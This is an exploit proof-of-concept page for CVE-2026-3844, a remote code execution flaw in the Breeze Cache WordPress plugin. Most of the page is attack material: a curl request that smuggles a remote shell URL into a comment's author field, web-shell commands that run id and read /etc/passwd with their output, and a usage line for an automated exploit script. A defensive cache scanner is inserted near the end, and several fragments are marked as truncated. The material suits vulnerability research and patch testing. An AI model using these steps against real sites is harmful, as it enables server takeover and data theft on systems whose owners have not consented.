## https://sploitus.com/exploit?id=6CE770C7-6A87-5F3E-8503-233B6FB19113
# CVE-2026-3844 - Breeze Cache

Vulnerable write in the gravatar fetch code (excerpt, truncated on this page):

```php
move(
    $temp_gravatar,
    $gravatar_local_path . $gravatar_name,
```

Attack flow (the first step of the diagram is truncated on this page):

```
   |                                        |  Comment saved
   |                                        |
   |  2. GET /?p=1                          |
   |  ------------------------------------> |
   |                                        |  get_avatar filter fires
   |                                        |  breeze_replace_gravatar_image()
   |                                        |    extracts srcset URL via regex
   |                                        |    calls fetch_gravatar_from_remote()
   |                                        |
   |            3. download_url()           |
   |            http://evil/s.php           |
   |                                        |
   |                                        |  Saved to:
   |                                        |  wp-content/cache/breeze-extra/
   |                                        |    gravatars/s.php
   |                                        |
   |  4. GET /wp-content/cache/breeze-extra |
   |         /gravatars/s.php?cmd=id        |
   |  ------------------------------------> |
   |                                        |  PHP executes as www-data
   |         uid=33(www-data)               |
```

## Preconditions

1. ...
2. ... (Breeze > Advanced)
3. WordPress comments must be open on at least one post
4. The attacker's payload server must be reachable from the WordPress server

---

## Docker Lab Setup

This PoC includes a self-contained Docker environment with:
- WordPress 6.5 + Breeze 2.4.4 (vulnerable, with gravatar hosting enabled)
- MariaDB 10.11
- A Python HTTP server hosting the PoC payload

### Prerequisites

- Docker and Docker Compose
- Python 3.8+ with `requests` (`pip install requests`)

### 1. Start the Lab

```bash
cd docker/
docker compose up -d --build
```

Wait ~30 seconds for WordPress to initialize. Verify:

```bash
curl -s http://localhost:8088/wp-content/plugins/breeze/readme.txt | grep "Stable tag"
# Expected: Stable tag: 2.4.4
```

### 2. Verify Preconditions

```
$ curl -s http://localhost:8088/wp-content/plugins/breeze/readme.txt | head -8

=== Breeze Cache ===
Contributors: Cloudways
Tags: cache,caching, performance, wp-cache, cdn
Requires at least: 6.0
Tested up to: 6.9
Requires PHP: 7.4
Stable tag: 2.4.4
```

The Docker setup automatically:
- Enables "Host Files Locally - Gravatars" (`breeze-store-gravatars-locally: 1`)
- Opens comments on posts
- Disables comment moderation (for immediate exploitation)

---

## Exploitation

### Manual Steps

#### Step 1 - Post the Malicious Comment

```bash
curl -X POST "http://localhost:8088/wp-comments-post.php" \
    -d "comment_post_ID=1&author=x+srcset=http://PAYLOAD_IP:9999/shell.php&email=test@test.com&comment=test&submit=Post+Comment"
```

Replace `PAYLOAD_IP` with the payload container's IP:
```bash
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' \
    $(docker compose -f docker/docker-compose.yml ps -q payload)
```

Expected response: `HTTP 302` redirect to the post page.

```
> POST /wp-comments-post.php HTTP/1.1
> Host: localhost:8088
> Content-Type: application/x-www-form-urlencoded
```

#### Step 2 - Load the Post Page

The rendered HTML shows that Breeze replaced the URL with a local cache path.

#### Step 3 - Verify File on Disk

```
$ docker exec CONTAINER ls -la /var/www/html/wp-content/cache/breeze-extra/gravatars/shell.php

-rw-r--r-- 1 www-data www-data 303 Apr 25 17:31 shell.php
```

The PHP payload is written verbatim, owned by `www-data`.

#### Step 4 - Confirm RCE

```
$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php"
CVE-2026-3844-VERIFIED

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=id"
CVE-2026-3844-VERIFIED
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=whoami"
CVE-2026-3844-VERIFIED
www-data

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=uname+-a"
CVE-2026-3844-VERIFIED
Linux cac7bf7f523f 6.12.76-linuxkit #1 SMP Sun Mar  8 14:41:59 UTC 2026 aarch64 GNU/Linux

$ curl "http://localhost:8088/wp-content/cache/breeze-extra/gravatars/shell.php?cmd=cat+/etc/passwd+|+head+-3"
CVE-2026-3844-VERIFIED
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```

### Automated Exploit Script

```bash
cd poc/
pip install requests
python3 exploit.py --target http://localhost:8088 --payload http://PAYLOAD_IP:9999/shell.php
```

```
======================================================================
CVE-2026-3844 - Breeze Cache
```

### Mitigation

Surviving fragment of the suggested web-server rule for the cache directory:

```apache
Require all denied
```
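Blocking execution is one half of the response; the other is checking whether anything has already landed in the cache. The following scanner is an added defensive example (not part of this PoC repository) that walks `wp-content/cache/breeze-extra/gravatars/`, the path used throughout this README, and flags files that are not plain images: executable extensions, files without image magic bytes, and image/PHP polyglots. The sample cache it builds is constructed for the demo.

```python
"""Added defensive check: flag non-image files in the Breeze gravatar cache.
Assumes the layout this README documents: wp-content/cache/breeze-extra/gravatars/
below the WordPress document root."""
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

GRAVATAR_DIR = "wp-content/cache/breeze-extra/gravatars"
# Magic-byte prefixes of the formats a real gravatar can be (JPEG, PNG, GIF, WebP/RIFF).
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a", b"RIFF")
EXEC_SUFFIXES = {".php", ".phtml", ".phar", ".php5", ".php7", ".phps"}


def classify(path: Path) -> Optional[str]:
    """Return a reason if the file should not be in a gravatar cache, else None."""
    if path.suffix.lower() in EXEC_SUFFIXES:
        return "executable extension"
    data = path.read_bytes()
    if not data.startswith(IMAGE_MAGIC):
        return "no image magic bytes"
    if b"<?php" in data or b"<?=" in data:
        return "php tag inside image"  # image header followed by PHP: a polyglot
    return None


def scan_gravatar_cache(docroot: str) -> List[Tuple[str, str]]:
    """Walk the gravatar cache below docroot; return (file name, reason) pairs."""
    base = Path(docroot) / GRAVATAR_DIR
    if not base.is_dir():
        return []
    findings = []
    for p in sorted(base.rglob("*")):
        if p.is_file():
            reason = classify(p)
            if reason:
                findings.append((p.name, reason))
    return findings


def run_demo() -> List[Tuple[str, str]]:
    """Build a constructed sample cache (not real data) in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as docroot:
        cache = Path(docroot) / GRAVATAR_DIR
        cache.mkdir(parents=True)
        (cache / "good.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # benign
        (cache / "shell.php").write_bytes(b"<?php echo 'x'; ?>")  # dropped script
        (cache / "fake.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>")  # polyglot
        return scan_gravatar_cache(docroot)


if __name__ == "__main__":
    for name, reason in run_demo():
        print(f"{name}: {reason}")
```

Run it against a real docroot with `scan_gravatar_cache("/var/www/html")`; an empty list means nothing suspicious was found (or the directory does not exist).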

## File Structure

```
cve-2026-3844/
  README.md              # This file
  docker/
    Dockerfile           # WordPress + Breeze 2.4.4 image
    docker-compose.yml   # Full lab (WP + MariaDB + payload server)
    entrypoint-custom.sh # Auto-configures WP with vulnerable settings
  poc/
    exploit.py           # Automated PoC exploit script
    validate.sh          # End-to-end Docker validation harness
  payloads/
    shell.php            # Harmless PoC payload (echo + id)
  screenshots/           # Step-by-step evidence captures
  validation/            # RAPTOR exploitability validation output
```

## References

- [NVD - CVE-2026-3844](https://nvd.nist.gov/vuln/detail/CVE-2026-3844)
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/id/e342b1c0-6e7f-4e2c-8a52-018df12c12a0)
- [WordPress Patch Changeset 3511463](https://plugins.trac.wordpress.org/changeset/3511463/breeze)
- [Vulnerable Source (2.4.1 tag)](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L119)

## Disclaimer

This proof-of-concept is provided for **authorized security testing, education, and defensive
research only**. Unauthorized use against systems you do not own or have explicit permission
to test is illegal.